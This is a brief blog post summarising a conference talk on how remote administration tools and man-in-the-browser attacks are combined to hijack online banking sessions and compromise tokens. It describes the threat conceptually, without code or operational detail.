Uri Fleyder (RSA) and Uri Rivner (Biocatch)'s presentation yesterday on the use of remote administration tools, coupled with "man in the browser" attacks is probably the most alarming threat exploitation I have seen recently.
The attack first exploits browser vulnerabilities through drive-by-downloads to infect the target machine. I suppose a drive-by-download is not even necessary - other vectors could also be exploited. Once the target machine is infected, the attacker can make use of a remote administration tool (RAT) to carry out an attack using the target machine. Through the use of "man in the browser" attack, the attacker intercepts browser activities, such as banking (or e-commerce or any other activity), and thus can not only capture data in realtime but can also take control over the browser and show false messages (such as longer login times, false redirections etc).
The beauty of this attack, is that the attack is completely out of the target user's machine, and tokens are actually also compromised in this attack (through the use of redirections). And there are very few countermeasures ...
No comments:
Post a Comment